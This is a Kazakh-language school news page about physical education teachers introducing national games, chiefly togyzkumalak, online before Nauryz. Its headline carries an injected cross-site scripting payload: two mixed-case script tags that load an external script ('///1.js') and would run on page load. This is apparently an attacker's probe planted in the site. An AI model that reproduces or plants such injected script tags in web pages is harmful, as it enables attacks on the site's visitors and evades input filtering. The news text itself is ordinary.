"Ұлттық ойындар" тақырыбында дене шынықтыру пәні мұғалімдері онлайн ұлттық ойын түрлерімен таныстырды<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

10.03.2021

Ұлыстың ұлы күні Наурыз мейрамы қарсаңында Талапкер ауылының жалпы білім беретін мектебінде "Ұлттық ойындар" тақырыбында дене шынықтыру пәні мұғалімдері онлайн ұлттық ойын түрлерімен таныстырды. Дене шынықтыру пәні мұғалімі Қайрбеков Дархан Сұлтанұлы қазақтың ұлттық ойыны Тоғызқұмалақ ойынымен таныстырды. Тоғызқұмалақ-қазақтың ұлттық интеллектуалдық ойыны. Бәсеке арнайы тақтада екі адам арасында өтеді. Ойын тақтасы – 2 қазан, 18 отау, 162 құмалақтан тұрады. Ойын басында әр ойыншыға бір қазан, тоғыз отауға тоғыз-тоғыздан салынған 81 құмалақ тиесілі. Алғашқы жүріс жасаған ойыншыны – бастаушы, қарымта жүріс жасаған ойыншыны – қостаушы деп атайды.

Просмотров: 657


Пікір қосу



Деректерді қолтаңбаға қосу